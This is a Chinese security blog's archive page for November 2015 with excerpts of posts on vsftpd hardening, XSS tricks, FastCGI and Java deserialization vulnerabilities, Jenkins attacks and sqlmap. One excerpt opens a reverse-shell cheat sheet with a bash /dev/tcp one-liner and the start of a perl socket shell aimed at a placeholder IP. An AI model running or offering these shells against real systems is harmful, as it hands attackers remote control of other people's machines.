11 2015 档案
摘要:vsftpd配置参数详细整理 -|白王斧三又干一vsftpd配置参数详细整理 -|白王斧三又干一 发表于 2005-10-23 20:30:001、vsftpd配置参数详细整理#接受匿名用户anonymous_enable=YES#匿名用户login时不询问口令no_anon_password=YE...
阅读全文
摘要:这几天在公司需要做基线安全,一直都没有经验,所以在网上找了一些,做来参考学习。vsftp配置详解这里是对vsftp配置文件的详细解释,主要参考了《RedHat8.0网络服务》一书中《使用vsftpd架设FTP服务器》一节的内容。声明:以 下内容基于Smartraining工作室Osmond 编著的《...
阅读全文
摘要:这周六会在公司分享经验和技巧,把自己的和网上的一些技巧来综合写一些,方便大家和自己:普通的XSS,储存,反射,DOM形成的无外乎就是输出点在html标签之间,html属性之间,成为JS代码,称为CSS代码。下面写一些我的技巧:1.引用新增的标签,例如chrome在下一个版本新增了,我们就可以利用...
阅读全文
摘要:看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/http://zone.wooyun.org/co...
阅读全文
摘要:bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1,注意某些linux不支持perl版本:perl -e 'use Socket;i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname...
阅读全文
摘要:1 = 0x20 && i line) { 29 echo sprintf('%6X',offset).' : '.implode(' ', str_split(line,2)) . ' [' . chars[i] . ']' . $newline; ...
阅读全文
摘要:原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重。长亭科技分析的非常细致。1 背景2015年11月6日,FoxGlove Security安全团队的@breenmachine...
阅读全文
摘要:原文:http://netsecurity.51cto.com/art/201407/444548.htm0×00 引言在2014年6月18日@终极修炼师曾发布这样一条微博:链接的内容是一个名为Jenkins的服务,可以在没有password的情况下受到攻击。而攻击方法比较有趣,Jenkins提供了...
阅读全文
摘要:版权:http://blog.csdn.net/yueguanghaidao/article/details/38026431每次看都不方便 摘抄下来之前一搞渗透的同事问我,sqlmapapi.py是干啥的,我猜很多人都玩过sqlmap,但玩过sqlmapapi的应该比较少,今天就和大家一起看看如...
阅读全文
摘要:原作者:http://defcon.cn/1618.html最近在折腾Kali Linux 顺便做一简单整理,至于安装就不再多扯了,估计会出现的问题上一篇文章《VMware虚拟机安装Kali Linux 遇到的问题》也有提到,包括Kali Linux和VMware Workstation 10 下载...
阅读全文